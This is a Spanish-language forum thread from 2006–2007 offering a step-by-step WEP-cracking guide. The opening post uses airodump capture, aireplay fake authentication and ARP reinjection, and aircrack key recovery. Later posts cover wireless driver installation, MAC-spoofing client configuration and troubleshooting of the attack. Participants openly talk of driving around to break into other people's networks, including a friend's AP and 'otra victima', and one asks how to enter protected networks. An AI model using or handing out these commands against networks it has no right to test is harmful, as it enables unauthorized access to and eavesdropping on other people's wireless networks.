PDA

Ver la versión completa : [Como] Seguridad inalámbrica: WEP (Crackear WEP)



j8k6f4v9j
07-07-2006, 01:55
[Como] Seguridad inalámbrica: WEP


Hay ya varios manuales, pero ahí va una mini guía:

-Descargar Troppix1.2. Esta livecd ya tiene los controladores para esta tarjeta (y la mayoría de ellas, sólo que para algunas sería recomendable tener las últimas versiones.. Por ejemplo para las atheros). Quemar el cd y obviamente arrancar el equipo con él.
-Luego sería más o menos así:


iwlist ra0 scan
Con esto escaneamos las redes al alcance. Nos daría un resultado similar a éste(es un ejemplo, en realidad al momento de escribir esto tengo 22 entradas en la lista ;D ):

Cell 01 - Address: 00:03:C9:BB:CC::DD
Mode:Managed
ESSID:"Essid1"
Encryption ***:on
Channel:11
Quality:0/100 Signal level:-62 dBm Noise level:-202 dBm
Cell 02 - Address: 00:03:C9:EE:FF:11
Mode:Managed
ESSID:"Essid2"
Encryption ***:on
Channel:6
Quality:0/100 Signal level:-71 dBm Noise level:-193 dBm

Suponiendo que queremos probar la seguridad de la primera entrada de la lista, y teniendo en cuenta que ya disponemos de las herramientas necesarias en nuestro sistema, comenzamos a hacer el trabajo. : P


airodump ra0 captura1 11
Con este comando hacemos que la tarjeta entre en modo monitor y se ponga a "escuchar" en el canal 11.


iwconfig ra0 rate 1
Este comando es muy recomendable ejecutarlo, ya que al bajar la velocidad de transmisión a 1 megabyte hacemos que la comunicación sea más estable a mayor distancia.


aireplay -1 0 -e Essid1 -a 00:03:C9:BB:CC::DD -h 55:44:33:22:11:00 ra0

Sólo clientes debidamente autenticados y asociados al AP podrán "entablar comunicación" con éste. El ataque -1 lo que hace es asocias la dirección MAC que definimos en -h con el AP con ESSID 'Essid1' y BSSID (esto es la MAC del AP) 00:03:C9:BB:CC::DD

Ahora, y si no recibimos paquetes de deautenticación, estamos asociados al AP. O mejor dicho está la MAC 00:03:C9:BB:CC::DD asociada al AP

Necesitaremos aproximadamente un mínimo de un millón de paquetes encriptados para poder averiguar la clave WEP que se está utilizando para cifrar la comunicación. Si pretendemos capturar este volumen de datos de forma pasiva (sólo "oyendo") pues hay que esperar sentados. Y mucho tiempo por cierto. Es por ello por lo que se usa la reinyección.


La reinyección consiste en básicamente capturar un paquete ARP para modificarlo ligeramente y enviárselo al AP. Éste, aunque fuera para mandarnos a hacer gárgaras, nos responde con un paquete también cifrado, pero con un nuevo vector de inicialización. Estos vectores de inicialización diferentes son justo lo que necesitamos.

Si en el comando que escribimos anteriormente para ejecutar airodump escribiésemos un '1' al final, entonces le estaríamos diciendo que sólo capturase los vectores de inicialización (de aquí en adelante IVs), en lugar de los paquetes difrados completos. El comando quedaría así:


airodump ra0 captura1 11 1

Pasamos a reinyectar, como si fuésemos el cliente asociado:


aireplay -3 -b 00:03:C9:BB:CC::DD -h 55:44:33:22:11:00 ra0

Debemos esperar. Vamos, mode_paciencia=on, ya que hasta que no capturemos ese ARP no comenzará la reinyección.

Cuando ésta se produzcan veremos como el valor de #data comienza a subir rápidamente. Todos esos paquetes quedarán almacenados en el archivo de captura que airodump ha creado al iniciarse. Pero ojo, se perderán si reiniciamos, ya que estamos trabajando con una livecd. Hay dos soluciones alternativas: Usar un linux instalada al disco duro (recomiendo ésta por supuesto) o guardar la captura en algún tipo de medio.

Una vez tenemos ese ansiado millón de paquetes podemos probar a lanzar aircrack sobre él para ver si nos da la clave.

Desde el mismo directorio donde lanzamos la captura:

aircrack *.cap
hará que aircrack se ponga manos a la obra. Si todo ha ido bien, dará sus frutos, y habremos demostrado una vez más que nuestro AP es vulnerable.



Troppix 1.2:
http://tinyurl.com/rp9fu (Pobierz para descargar)

Cómo instalar el módulo para nuestra tarjeta inalámbrica en linux (debian)


En esta guía explicaré cómo instalar el módulo encargado de controlar una tarjeta inalámbrica con chipset rt2500.


Para poder añadir módulos a nuestro sistema debemos tener instaladas en éste bien las fuente o bien los headers del kernel que estemos usando.

En debian es bastante sencillo, ya que el mismo comando averiguará la versión del kernel que estamos usando y nos instalará los headers adecuados:


apt-get install kernel-headers-$(uname -r)

Una vez tengamos las cabeceras (headers) del kernel necesitaremos algunos programas más. Para estar seguros instalaremos el paquete buil-essential:


apt-get install build-essential

Luego de esto descargamos las fuentes de la última versión de los drivers para la tarjeta.

Para esta guía usaré: rt2500 PCI/PCMCIA nightly CVS tarball: rt2500-CVS. Las diferentes versiones de este driver las podéis encontrar en http://rt2x00.serialmonkey.com/wiki/index.php/Downloads

Bien, vamos al lío.

Antes de nada, por cuestiones personales de organización l o que yo hago es cambiar a un directorio donde poder operar sin líos innecesarios:


cd /usr

En este directorio no tenemos permisos de escritura como usuarios ordinarios, por lo que para mayor facilidad podemos hacernos root desde ya


su

tras introducir el password de root ya tenemos los privilegios de superuser. Pasamos a descargar el paquete con el módulo


wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz

Una vez lo tenemos descargado lo podemos ver con


ls

Ahora lo descomprimimos


tar -xvzf rt2500-cvs-daily.tar.gz

Esto nos creará una carpeta cuyo nombre comienza por 'rt'. Entramos en ese directorio


cd rt*

Si tenemos todo lo necesario bastará con compilar el controlador



cd Module;make

e instalarlo



make install

Ahora ya debemos poder iniciar el módulo. Para ello bastará con


modprobe rt2500

Y deberá aparecer una nueva interfaz en nuestro sistema llamada 'ra0'. La podemos ver con


ifconfig -a

Si queremos configurar la conexión inalámbrica necesitaremos las wireless-tools. Pero eso ya es otro manual : P (próximamente)





Salu2




* Este manual lo hago de memoria, ya que ahora mismo no me encuentro ante un linux en que comprobar los comandos y demás, sino ante mi nuevo OpenBSD (si no lo digo exploto ;) )

Salu2

SxR
07-07-2006, 10:53
Buen manual........fijado!!!

smaug_
07-07-2006, 11:48
jojojo! Muy bueno j8, este mismo finde me pongo a probarlo y ya comentare que tal ^^

j8k6f4v9j
07-07-2006, 14:28
Buen manual........fijado!!!

Estaba pensando en que fuese éste el artículo que escribiera para la ezine, ya tengo algún tutorial hecho sobre hacking wireless, y en vista del chinchetazo que le has pegado a este mini, lo usaré como base para irlo ampliando, corrigiendo, etc, hasta la publicación de la ezine.

Salu2

clarinetista
07-07-2006, 16:35
Estaba pensando en que fuese éste el artículo que escribiera para la ezine
Salu2
Por mi perfecto

j8k6f4v9j
07-07-2006, 20:26
Por mi perfecto

Pues a ver si me pongo a currármelo, porque este mini manual me parece muyyy escaso.

PD: clarinetista, me vas a matar, pero ... No es que no recuerde mi user / pass. Es peor, NO RECUERDO LA URL xD xD xD

Salu2

clarinetista
08-07-2006, 00:32
Ya veras como arme la maquina de repartir collejas
Te contacto por mp

j8k6f4v9j
08-07-2006, 16:22
Actualización: Añado cómo compilar e instalar el módulo para tarjetas inalámbricas con chipset rt2500 en debian linux (y otras distros basadas en debian)

smaug_
08-07-2006, 16:27
Bueno, lo que dije. Aprovechando un rato libre, me he puesto a probarlo y os cuento.
Me he bajado la troppix 1.2. Arranco con ella, y sigo los pasos.
Arranco el airodump, y lo dejo capturando paketes.
Luego con aireplay hago la autentificacion y me dice que se ha hecho correctamente.
Por ultimo la inyeccion de paquetes, lo hago tal y como has puesto en el manual, (cambiando las macs por las que corresponden por supuesto XD )
Y empieza a leer paquetes, hasta ahi bien.
Luego un poco de paciencia y alos 5 minutos, a veces menos a veces mas. Captura un solo paquete ARP. Si teoricamente con eso vale, airecrack empieza a enviar paquetes a lo loco.
Obviamente, yo me emocion, funciona!!! ^^
Pero luego un vistazo al airodump y veo que solo ha capturado un IV... y no sube... ni rapido ni lento.

A que se puede deber?? Le estoy dando vueltas, lo tengo desde hace 15 minutos puesto por si le hace falta tiempo (cosa que creo que no...) Y nada.

La tarjeta es una miniPCI con el chipset RT2500 y el AP es un linksys wap11 v2.6.

Puede que el punto de acceso sea invulnerable a este ataque? que mas cosas podria probar? Estoy buscando informacion del AP , pero no encuentro nada que diga que es vulnerable o invulnerable a este ataque :S

Bueno cuando podais me echais una mano, gracias :P

smaug_
10-07-2006, 12:45
He seguido buscando y no consigo encontrar nada sobre el router. Y airodump sigue sin caputar paquetes IV.
j8, muy bueno el tutorial para instalar la rt2500 en debian, esta tarde si tengo un rato me pongo, y asi no tengo que ir usando la troppix ^^U

Y amigos, si no me dan una solucion para esta tarde, destruire el foro (con voz de maligno) y si es un ultimatum :P

Ya en serio, si esta tarde no consigo nada, me cojo el coche y a probar con las redes ajenas, a ver si es del router o estoy haciendo algo mal. Un saludo ^^

PD: Una preguntilla, que paquetes tengo que instalar para poder tener el comando iwconfig??, solo con poner "apt-get install iptools" bastaria???
Bueno esta tarde lo probare cunado tenga el linux a mano.

j8k6f4v9j
10-07-2006, 13:52
a ver si es del router o estoy haciendo algo mal

Seguramente con otros tengas menos problema. Aunque hay otras soluciones. Si reinyectas con el -3 directamente sin usar el -1 poniendo como -h la MAC del cliente que está asociado en ese momento


PD: Una preguntilla, que paquetes tengo que instalar para poder tener el comando iwconfig??, solo con poner "apt-get install iptools" bastaria???
Bueno esta tarde lo probare cunado tenga el linux a mano.

Salu2

wireless-tools



apt-get install wireless-tools

smaug_
10-07-2006, 14:07
Pero si no hay ningun cliente asociado??
Las pruebas las estoy haciendo con el AP sin ningun cliente asociado.

j8k6f4v9j
10-07-2006, 14:28
Puedes probar a asociar otras direcciones MAC distintas. Muchos APs llevan una lista de direcciones MAC que nunca permitirán que se le asocien.

No recibes algo como 'Got a deauth packet?

Salu2

ifornes46870
11-07-2006, 15:15
Hola:
¿Alguien me puede indicar de donde me puedo bajar Troppix1.2? Quisiera algo para poder entrar en las redes inalámbricas protejidas con mi palm tx, ¿hay algo?

KirtasH
11-07-2006, 15:26
Troppix 1.2:
http://tinyurl.com/rp9fu (Pobierz para descargar) si hubieras leido el primer post de j8 alli mismo tiene puesto el link...
Salu2

ifornes46870
11-07-2006, 15:34
Tienes toooooooa la razón, perdón, pero que taruga estoy, mil perdones, a veces es que estoy medio :0=

j8k6f4v9j
11-07-2006, 23:04
Configurar nuestra tarjeta inalámbrica como cliente (modo infraestructura)

Para la configuración de la tarjeta usaremos básicamente los comandos ifconfig y iwconfig.

Mi manera de hacerlo es bastante sencilla. Creo un script para cada red, escenario o lo que sea. Este script se encargará de todo desde cero.

Para configurar la tarjeta necesitaremos cierta información. Alguna es esencial, pero otra no tanto. Normalmente con la salida de iwlist tendremos casi todo lo necesario. Digo casi porque lógicamente la clave (por ejemplo no aparecerá ahí en ningún caso :D ).

Hay veces que iwlist no basta para obtener toda la información necesaria (salvando la clave), ya que un punto de acceso cuyo ESSID esté configurado para ser oculto no aparecerá. En este caso se tiene que usar un monitorizador de tráfico para conexiones inalámbricas (kismet o airodump son los más usados) y esperar a que se conecte un cliente legítimo, o conocer el ESSID porque nos fuera proporcionado.

La salida de iwlist varía en función del driver o módulo que usemos. En el caso del rt2500 y Wireless-Tools en su version 27 proporciona algo como lo que sigue (sólo pongo 4 porque si no me doy con el post ;) ):



user@host:~$ sudo iwlist ra0 scan
ra0 Scan completed :
Cell 01 - Address: 00:03:C9:XX:FF:GG
Mode:Managed
ESSID:"ESSIDQUEELIGIOELAMO"
Encryption flor:on
Channel:11
Quality:0/100 Signal level:-70 dBm Noise level:-192 dBm
Cell 02 - Address: 00:03:C9:XX:FF:GG
Mode:Managed
ESSID:"ESSIDQUEELIGIOELOTROAMO"
Encryption flor:on
Channel:11
Quality:0/100 Signal level:-65 dBm Noise level:-192 dBm
Cell 03 - Address: 06:0A:50:XX:FF:GG
Mode:Managed
ESSID:"OTROESSIDQUEELIGIOELAMO"
Encryption flor:on
Channel:6
Quality:0/100 Signal level:-44 dBm Noise level:-192 dBm
Cell 04 - Address: 00:0A:50:XX:FF:GG
Mode:Managed
ESSID:"OTROESSIDQUEELIGIOELOTROAMO"
Encryption flor:off
Channel:10
Quality:0/100 Signal level:-76 dBm Noise level:-192 dBm


En este ejemplo nuestro AP es lógicamente es el que tiene mayor intensidad de señal. Sería el "Cell 03", ya que los valores son negativos y por tanto será mayor la señal cuya intensidad se acerque más a 0.

Para una conexión cifrada necesitamos al menos saber:

ESSID
FLOR

El resto se configurará automáticamente una vez reciba las tramas de control del punto de acceso.

El script de configuración para nuestra red será un simple fichero regular (ejecutable) con el siguiente contenido:



!#/bin/sh
modprobe -r rt2500
modprobe rt2500
ifconfig ra0 hw ether 00:11:22:33:44:55
iwconfig ra0 essid OTROESSIDQUEELIGIOELAMO flor 62:75:72:72:6f:77:69:72:65:6c:65:73:73
ifconfig ra0 192.168.1.2 up
route add default gw 192.168.1.1


Tan simple como eso. Sólo tendremos que cambiar cada cosa para adecuarla a nuestra red. Este script, además de configurar la tarjeta también nos falsea la dirección MAC de nuestra tarjeta, que pasará a ser 00:11:22:33:44:55

Los valores que tendremos que sustituir serán:
00:11:22:33:44:55 por la dirección MAC que queramos usar.
OTROESSIDQUEELIGIOELAMO por el ESSID de nuestra red.
62:75:72:72:6f:77:69:72:65:6c:65:73:73 por la clave en hexadecimal con que esté cifrada la conexión
192.168.1.2 por la dirección IP local que tendrá nuestra máquina en la red (debe estar dentro del rango de la puerta de enlace lógicamente)
192.168.1.1 por la dirección IP de la puerta de enlace.

Supongamos que el fichero que hemos creado se llama "conectaAP". Pues deberemos darle permisos de ejecución:



chmod u+x conectaAP


Lo ejecutamos y listo! ya tenemos configurada nuestra conexión.



sh ./conectaAP




Si miramos el man ifconfig veremos que podemos configurar las interfaces mediante el archivo /etc/network/interfaces, Para hacerlo con la configuración (IP estática) del ejemplo dejaremos la parte que atañe a nuestra tarjeta tal que así:


auto ra0
iface ra0 inet static
address 192.168.1.2
netmask 255.255.255.0
gateway 192.168.1.1
hwaddress ether 00:11:22:33:44:55
wireless_essid OTROESSIDQUEELIGIOELAMO
wireless_flor 62:75:72:72:6f:77:69:72:65:6c:65:73:73


Así, cada vez que inicie el sistema se configurará automáticamente la conexión. Para obtener la IP mediante DHCP pondríamos esto:


auto ra0
iface ra0 inet dhcp
hwaddress ether 00:11:22:33:44:55
wireless_essid OTROESSIDQUEELIGIOELAMO
wireless_flor 62:75:72:72:6f:77:69:72:65:6c:65:73:73


Como curiosidad decir que se puede poner la clave en ASCII también, no sólo en hexadecimal. Sólo habrá que añadir 's:' al principio de la cadena. De modo que la clave 62:75:72:72:6f:77:69:72:65:6c:65:73:73 se pondría así:


iwconfig ra0 flor s:burrowireless

Salu2

smaug_
13-07-2006, 10:11
Esta ultima parte no la habia visto. Interesante como siempre :P

Bueno, ayer volvi a meterme con las redes sin cables, y me acabare ahorcando con algun cable inalambrico...
Me fui con el coche a buscar redes, y la verdad, airodump es muy bueno para detectarlas ^^.
El caso esque acabe en la puerta de casa de un amigo intentando entrar en la suya. Pero a la hora de autentificarme, me decia algo asi como "MAC rejected y AP". Intente hacer la inyeccion de paquetes, pero claro sin estar autentificados, no consiguio caputrar el paquete ARP. Y no habia trafico en la red.

Lo primero que se me vino a la cabeza, fue que tenia puesto el filtrado por MAC, pero le pregunte y me dijo que no llego a meterlo.
Por desgracia me quede sin bateria en el portatil para buscar otra victima >_<

Por cierto j8, no recibo nada parecido a "Got a deauth packet"
:S

j8k6f4v9j
13-07-2006, 14:53
"MAC rejected y AP".

Supongo que será "AP rejects MAC" o algo así.

Es posible que en lugar de "open system authentication" (que es el modo más extendido y más seguro) esté usando "shared *** authentication". Con esta segunda forma de autenticación. la seguridad es menor que con la primera, pero el método de obtención de la clave es totalmente diferente.

Salu2



Intente hacer la inyeccion de paquetes, pero claro sin estar autentificados, no consiguio caputrar el paquete ARP. Y no habia trafico en la red.

Lo primero que se me vino a la cabeza, fue que tenia puesto el filtrado por MAC, pero le pregunte y me dijo que no llego a meterlo.
Por desgracia me quede sin bateria en el portatil para buscar otra victima >_<

Por cierto j8, no recibo nada parecido a "Got a deauth packet"
:S

badlook
26-09-2006, 13:57
Gracias por el manual! Lo probaré en breve.

smaug_
06-10-2006, 18:36
Por fin!! Despues de un mes sin portatil, ya me lo han devuelto vivito y coleando, o eso creo. Me parece que hay un problema con la bateria, pero lo tengo que mirar con atencion. Pero ese no es el tema. Al tener de nuevo el portatil, me he vuelto a poner a trastear con la debian, asi que he empezado a instalarla y configurarla a mi gusto (aun me queda mucho, ya dare la vara con lo que me cause dificultades).
Bueno, el caso que siguiendo eel buen manual de j8 he conseguido instalar y configurar la inalambrica, pero solo suelto esta parrafada para decir un pequeño apunte.
Me edito, me acabo de dar cuenta que lo de flor es por la censura, ya que no permite el foro decir la palabra "llave" ^^U

Y otro apunte por si alguien tiene el mismo problema que yo, al añadir la puerta de enlace a la tabla de enrutamiento me decia :
SIOCADDRT: El fichero existe.
Era porque la tenia configurada para la eth0 (la conexion de cable) Lo he arreglado echando abajo la conexion de cable (ifdown eth0). Pero como seria simplemente eliminar esa entrada?? Esque he toqueteado un poco y no l he sacado :S

j8k6f4v9j
07-10-2006, 16:43
Pero como seria simplemente eliminar esa entrada?? Esque he toqueteado un poco y no l he sacado :S

Si la entrada fue creada con ...
route add default gw 192.168.0.1 eth0 pero en realidad quieres que sea en ra0(por ejemplo), pues...
route del default && route add default gw 192.168.0.1 ra0

Salu2

LooKoo
08-01-2007, 16:36
slax ~ # iwlist ra0 scan

ra0 Interface doesn`t support scanning

utilizo Slax BackTrack (tiene casi todo para wireless crack ) Linux slax 2.6.15.6

Con el Kismet recibo paketes de una red wireless (con datos : Network, channel, encryption WEP, LLC, BSSID, maxrate 54.0, etc ) .Pero los paketes no se guardan ninguno .cap
tambien tengo instalado ... aircrack airodump airplay ... y
hay algun otro mode de obtener los paketes en .cap para crackearles ?

LooKoo
08-01-2007, 16:37
He conseguido con el Kismet ... 50 Mb de paketes unos 350 IVs ... el problema es que llevo 12 horas con el aircrack y ningun resultado ... :(
me aconsejais algo ?

j8k6f4v9j
15-01-2007, 01:18
En kismet puedes ver el canal en que opera la red que mencionas. Con lo que podrás usar airodump en sólo ese canal para capturar los IVs necesarios.

Claro que te puedo aconsejar algo: No sigas intentando crackear la WEP con 350 IVs porque incluso es probable que dejes frito tu PC. Si observas el uso del procesador a la hora de lanzar aircrack verás que se pone a casi el 100%

Necesitarás alrededor de un millón de paquetes cifrados para obtener una WEP de 128 bits de profundidad, Y unos 500.000 ( o con suerte 250.0009 para una de 64 bits.

A ese ritmo de captura lógicamente tardarás muuuucho tiempo en conseguirlos, por lo que la mejor opción (siempre que sea posible y después de la de capturar tráfico legítimo) será la reinyección.

Para eso puedes leer la documentación de aircrack, y si tienes algún problema con él estaré encantado de echarte una mano.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

LooKoo
15-01-2007, 17:44
A ese ritmo de captura lógicamente tardarás muuuucho tiempo en conseguirlos, por lo que la mejor opción (siempre que sea posible y después de la de capturar tráfico legítimo) será la reinyección.


No puedo utilizar el aireplay para la inyectacion pq mi chipset es Centrino ... y me pone que no functiona con este chipset :( . Hay otro mode de accelerar el proceso ?

Gracias

j8k6f4v9j
16-01-2007, 21:13
Lo mejor sería que te pillases una USB compatible con aireplay. Son baratas y nunca se sabe cuándo te pueden servir ;)

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

LooKoo
16-01-2007, 21:34
En 21 horas solo a cogido 1470 Ivs.... mejor me compro una tarjeta :)))
OK gracias :)

salu2

LooKoo
25-01-2007, 21:40
Weno me compre la tarjeta :). Una D-Link AirPlus G pero el linux no la reconoce :( . :confused:

slax ~ # uname -a
Linux slax 2.6.15.6 #1 SMP Fri Mar 24 16:46:23 GMT 2006 i686 unknown unknown GNU/Linux
slax ~ # lspci
00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge (rev 80)
00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge
00:09.0 Multimedia audio controller: Creative Labs SB Audigy LS
00:0b.0 Network controller: RaLink: Unknown device 0302
00:0f.0 RAID bus controller: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80)
00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06)
00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86)
00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South]
00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 78)
01:00.0 VGA compatible controller: nVidia Corporation GeForce 6200 (rev a1)
---------------------------------------------------------------------------------------------------------------------------

slax ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

sit0 no wireless extensions.

j8k6f4v9j
04-02-2007, 13:27
Esa tarjeta no te servir&#225;, tiene uno de los nuevos chipsets de ralink que son desconocidos para GNU/Linux. Dec&#237;an hace meses que liberar&#237;an los controladores pero no he vuelto a saber sobre versiones estables y eficientes de los mismos. Si est&#225;s a tiempo... &#161;c&#225;mbiala! Yo me pillar&#237;a una con chipset atheros, como la smcwpcit-g por ejemplo.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

LooKoo
25-06-2007, 03:23
[root@82 ~]# lspci
00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge (rev 80)
00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge
00:09.0 Multimedia audio controller: Creative Labs SB Audigy LS
00:0b.0 Network controller: RaLink RT2561/RT61 rev B 802.11g
00:0f.0 RAID bus controller: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80)
00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06)
00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86)
00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South]
00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 78)
01:00.0 VGA compatible controller: nVidia Corporation NV44A [GeForce 6200] (rev a1)

LooKoo
25-06-2007, 03:33
Ahora parece q si me la reconoce el Fc 7 2.6.21-1.3194.fc7.
Me baje el driver http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz lo instale pero no me aparece ninguna interfaz nueva :( .

[root@82 ~]# cd rt61-cvs-2007062420
[root@82 rt61-cvs-2007062420]# ls
CHANGELOG CVS FAQ LICENSE Module THANKS WPA_Supplicant
[root@82 rt61-cvs-2007062420]# cd Module
[root@82 Module]# make
make[1]: Entering directory `/usr/src/kernels/2.6.21-1.3194.fc7-i686'
CC [M] /root/rt61-cvs-2007062420/Module/rtmp_main.o
CC [M] /root/rt61-cvs-2007062420/Module/mlme.o
CC [M] /root/rt61-cvs-2007062420/Module/connect.o
CC [M] /root/rt61-cvs-2007062420/Module/sync.o
CC [M] /root/rt61-cvs-2007062420/Module/assoc.o
CC [M] /root/rt61-cvs-2007062420/Module/auth.o
CC [M] /root/rt61-cvs-2007062420/Module/auth_rsp.o
CC [M] /root/rt61-cvs-2007062420/Module/rtmp_data.o
CC [M] /root/rt61-cvs-2007062420/Module/rtmp_init.o
CC [M] /root/rt61-cvs-2007062420/Module/sanity.o
CC [M] /root/rt61-cvs-2007062420/Module/rtmp_wep.o
CC [M] /root/rt61-cvs-2007062420/Module/wpa.o
CC [M] /root/rt61-cvs-2007062420/Module/md5.o
CC [M] /root/rt61-cvs-2007062420/Module/rtmp_tkip.o
CC [M] /root/rt61-cvs-2007062420/Module/rtmp_info.o
CC [M] /root/rt61-cvs-2007062420/Module/eeprom.o
LD [M] /root/rt61-cvs-2007062420/Module/rt61.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/rt61-cvs-2007062420/Module/rt61.mod.o
LD [M] /root/rt61-cvs-2007062420/Module/rt61.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.21-1.3194.fc7-i686'
!!! WARNING: Module file much too big (>1MB),
!!! Check your kernel settings or use 'strip'
*** Module rt61.ko built successfully
[root@82 Module]# make install
*** Install module in /lib/modules/2.6.21-1.3194.fc7/extra ...
make[1]: Entering directory `/usr/src/kernels/2.6.21-1.3194.fc7-i686'
INSTALL /root/rt61-cvs-2007062420/Module/rt61.ko
DEPMOD 2.6.21-1.3194.fc7
make[1]: Leaving directory `/usr/src/kernels/2.6.21-1.3194.fc7-i686'
/sbin/depmod -a
*** Update /etc/modprobe.conf alias for wlan*
*** Install firmware in /lib/firmware ...
*** Check old config ...


Se instalo correctamente ?
[root@82 Module]# modprobe rt61

[root@82 Module]# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:13:8F:26:5D:C0
inet addr:82.xxx.xxx.xxx Bcast:82.xxx.xxx.xxx Mask:255.255.254.0
inet6 addr: fe80::213:8fff:fe26:5dc0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43615 errors:0 dropped:0 overruns:0 frame:0
TX packets:18481 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:41965953 (40.0 MiB) TX bytes:1516070 (1.4 MiB)
Interrupt:20 Base address:0xcd00

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:6477 errors:0 dropped:0 overruns:0 frame:0
TX packets:6477 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47845072 (45.6 MiB) TX bytes:47845072 (45.6 MiB)


Tb instale RutilT http://cbbk.free.fr/bonrom/ http://cbbk.free.fr/bonrom/?download=RutilTv0.14.tar.gz para poder manejar la wifi mejor pero me da el mismo error :

[root@82 RutilTv0.14]# rutilt
Can't find any wireless network interface.
Code : -3


Salu2

LooKoo
25-06-2007, 04:31
Bueno areglado .Solo le faltaba un reboot :)


[root@82 ~]# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11g ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Encryption key:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Espero q todo esto sea util tb para otros ..

Salu2

LooKoo
25-06-2007, 05:00
Uff he vuelto con otro problema :(
[root@82 ~]# airodump-ng --beacons --channel 9 --cswitch 1 wmaster0
ioctl(SIOCSIWMODE) failed: Operation not supported
Error setting monitor mode on wmaster0
[root@82 ~]# airodump-ng --beacons --channel 9 --cswitch 1 wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
Error setting monitor mode on wlan0


[root@82 ~]# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11g ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Encryption key:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

j8k6f4v9j
25-06-2007, 11:50
Lee la documentación del driver, quizá gestione los modos de la tarjeta de otra forma.

Por ejemplo, con madwifi-ng se hace a la hora de levantar el módulo:

modprobe ath_pci autocreate=monitor

Pero ten en cuenta que ese módulo es muy joven, y quizá incluso sólo haya soporte para el modo managed.

Como te digo, es mejor que te pases por el sitio oficial de los drivers y leas toda la documentación y las notas.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

LooKoo
25-06-2007, 14:00
[root@LooKoo ~]# aireplay-ng -1 1 -e Essid -b 00:xx:Xx:xx:Xx:xx -h 00:19:5B:2C:23:E5 wlan0
13:37:35 Waiting for beacon frame (BSSID: 00:11:F5:14:5A:EC)
13:37:35 Sending Authentication Request
13:37:37 Sending Authentication Request
13:37:39 Sending Authentication Request
13:37:41 Sending Authentication Request
13:37:43 Sending Authentication Request
13:37:45 Sending Authentication Request
13:37:47 Sending Authentication Request

Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
La asociacion con el AP no es posible ...

[root@LooKoo ~]# iwconfig wlan0 rate 1M
Error for wireless request "Set Bit Rate" (8B20) :
SET failed on device wlan0 ; Operation not supported.

[root@LooKoo ~]# aireplay-ng -3 -e Essid -b 00:xx:Xx:xx:Xx:xx -h 00:19:5B:2C:23:E5 wlan0
Saving ARP requests in replay_arp-0625-135511.cap
You should also start airodump-ng to capture replies.
